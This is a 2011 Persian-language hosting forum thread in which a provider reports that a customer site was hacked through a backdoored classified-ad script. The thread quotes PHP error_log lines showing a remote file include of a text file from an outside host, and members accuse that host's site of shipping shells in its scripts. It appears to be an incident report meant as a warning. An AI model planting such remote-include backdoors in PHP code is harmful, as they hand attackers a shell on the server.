-
June 19th, 2011, 15:47
عضو انجمن
تقلب ، د ز د ی تا کی ؟؟--> P30vel.ir
یکی از سایت های مشتریان ما هک شد و ازونجایی که امنیت سرورم واسه من خیلی مهمه دنبال دلیل یا باگ احتمالی بودم که با مشاهده فایل error_log و آدرس سایتی که ادعای نیت خیر داره رو دیدم ! :
Failed opening 'http://www.p30vel.ir/hmbc.txt?'
ایشون داخل اسکریپت مورد نطر که یک اسکریپت نیازمندیها یا درج آگهی هست فایل بکدور گداشتن و از سرور شل میگیرن
متن error_log :
[24-
کد:
Feb-2011 07:10:50] PHP Warning: include() [<a href='function.include'>function.include</a>]: URL file-access is disabled in the server configuration in /home/rxxxb/public_html/lxxxxy.ir/ajax/send_for_friend.php on line 53
[24-Feb-2011 07:10:50] PHP Warning: include(http://www.p30vel.ir/hmbc.txt?) [<a href='function.include'>function.include</a>]:
failed to open stream: no suitable wrapper could be found in /home/rxxxxb/public_html/lxxxxy.ir/ajax/send_for_friend.php on line 53
[24-Feb-2011 07:10:50] PHP Warning: include() [<a href='function.include'>function.include</a>]: Failed opening 'http://www.p30vel.ir/hmbc.txt?'
for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/rxxxxb/public_html/lxxxxy.ir/ajax/send_for_friend.php on line 53
جالبه همکاران عزیز هم تو سایت این آدم تبلیغات میدن و ازشون حمایت می کنند! به این فکر نمی کنند که امکان داره یکی از همین اسکریپت ها روی سرور خودشون نصب بشه....
موفق باشید
-
تعداد تشکر ها ازMasoud.B به دلیل پست مفید
alborzgostar, EXXXIR, fanoos, goldcom, IranianServer, it-net, kashaneh, Kurd Project, MEHDI KARAMI, mohammadlover, Mohammad_reza, mortezafox, nightman, parsehost, s.w.a.t, Saati, saeid.roop, sibs, tebyan, tmfar, ToooPDL
-
June 19th, 2011 15:47
# ADS
-
June 19th, 2011, 15:53
پاسخ : تقلب ، د ز د ی تا کی ؟؟--> P30vel.ir
تو انجمن هاي سايت خودش بنويسيد
ما هم حمايتتون ميكنيم
-
تعداد تشکر ها از goldcom به دلیل پست مفید
-
June 19th, 2011, 16:02
عضو انجمن

نوشته اصلی توسط
goldcom
ما هم حمايتتون ميكنيم
راست میگه ، بنویسید و لینک بدید
دارای نماد اعتماد دوستاره و نشان ملی ثبت (ساماندهی)
-
تعداد تشکر ها از IranianServer به دلیل پست مفید
-
June 19th, 2011, 16:05
عضو دائم
این عکس رو هم ضمیمه کن :
-
تعداد تشکر ها ازmohsen1 به دلیل پست مفید
-
June 19th, 2011, 16:09
عضو انجمن

نوشته اصلی توسط
goldcom
ما هم حمايتتون ميكنيم

نوشته اصلی توسط
IranianServer
راست میگه ، بنویسید و لینک بدید
ممنون از حمایتتون
ترجیح میدم آمار بازدید سایتی رو که یک مشت lamer و د ز د مدیریت می کنند رو با این کارا بالا نبرم
-
تعداد تشکر ها از Masoud.B به دلیل پست مفید
-
June 19th, 2011, 16:20
عضو انجمن
بله ما یکی از سایتهای مشتریانمون رو منتقل کردیم روی سرور خودمون. یه نرم افزار امنتیی رو سرور نصب کردیم به محض اینکه سایتی آلود به شل یا امثالهم باشه شل رو پاک و سایت را ساسپند میکند به صورت خودکار. اگر اشتباه نکنم حدود 10 12 تا شل پیدا کرد. بعدا کاشف به عمل اومد که ایشون این اسکرپیتها رو از سایت پی سی ول دانلود و نصب کردند!
دوستان مراقب باشند. به نظر بنده مطمئن ترین سایت در زمینه اسکرپیت سایت پرشین اسکرپیت میباشد.
موفق باشید
گمشده این نسل، اعتماد است نه اعتقاد. اما افسوس، که نه بر اعتماد اعتقادیست و نه بر اعتقادها اعتماد!
تنها راه ارتباطی با من:
s.w.a.t@webhostingtalk.ir
-
تعداد تشکر ها از s.w.a.t به دلیل پست مفید
-
June 19th, 2011, 16:22
ترجیح میدم آمار بازدید سایتی رو که یک مشت lamer و د ز د مدیریت می کنند رو با این کارا بالا نبرم
آمارشون بالا نميره
بلكه خيلي ها ديگه سمت اين سايت نميرن
من كه ديگه عمرا اين سايت رو باز كنم
-
-
June 19th, 2011, 16:22
عضو دائم
چنین موردی قبلا در تاپیک دیگری هم ذکر شده بود توسط شخصی دیگر در همین فروم
-
-
June 19th, 2011, 16:25
عضو انجمن

نوشته اصلی توسط
s.w.a.t
بله ما یکی از سایتهای مشتریانمون رو منتقل کردیم روی سرور خودمون. یه نرم افزار امنتیی رو سرور نصب کردیم به محض اینکه سایتی آلود به شل یا امثالهم باشه شل رو پاک و سایت را ساسپند میکند به صورت خودکار. اگر اشتباه نکنم حدود 10 12 تا شل پیدا کرد. بعدا کاشف به عمل اومد که ایشون این اسکرپیتها رو از سایت پی سی ول دانلود و نصب کردند!
دوستان مراقب باشند. به نظر بنده مطمئن ترین سایت در زمینه اسکرپیت سایت پرشین اسکرپیت میباشد.
موفق باشید
میشه اسم اسکریپت رو بگید .
دارای نماد اعتماد دوستاره و نشان ملی ثبت (ساماندهی)
-
-
June 19th, 2011, 16:29
عضو انجمن
من چند بار اسکریپت هاشونو رو وی پی اس برای تست نصب کردم وی پی اس به %$#%$%$#@! داد!!!!!! دیگه اصلا از اون موقعه سایتش نمیرم یه مشت ادم تازه به دوران رسیده ..... فقط پرشین اسکریپت
Google AdWords Business $25 -100$ Google Network AdSense
@AdWordsfa
-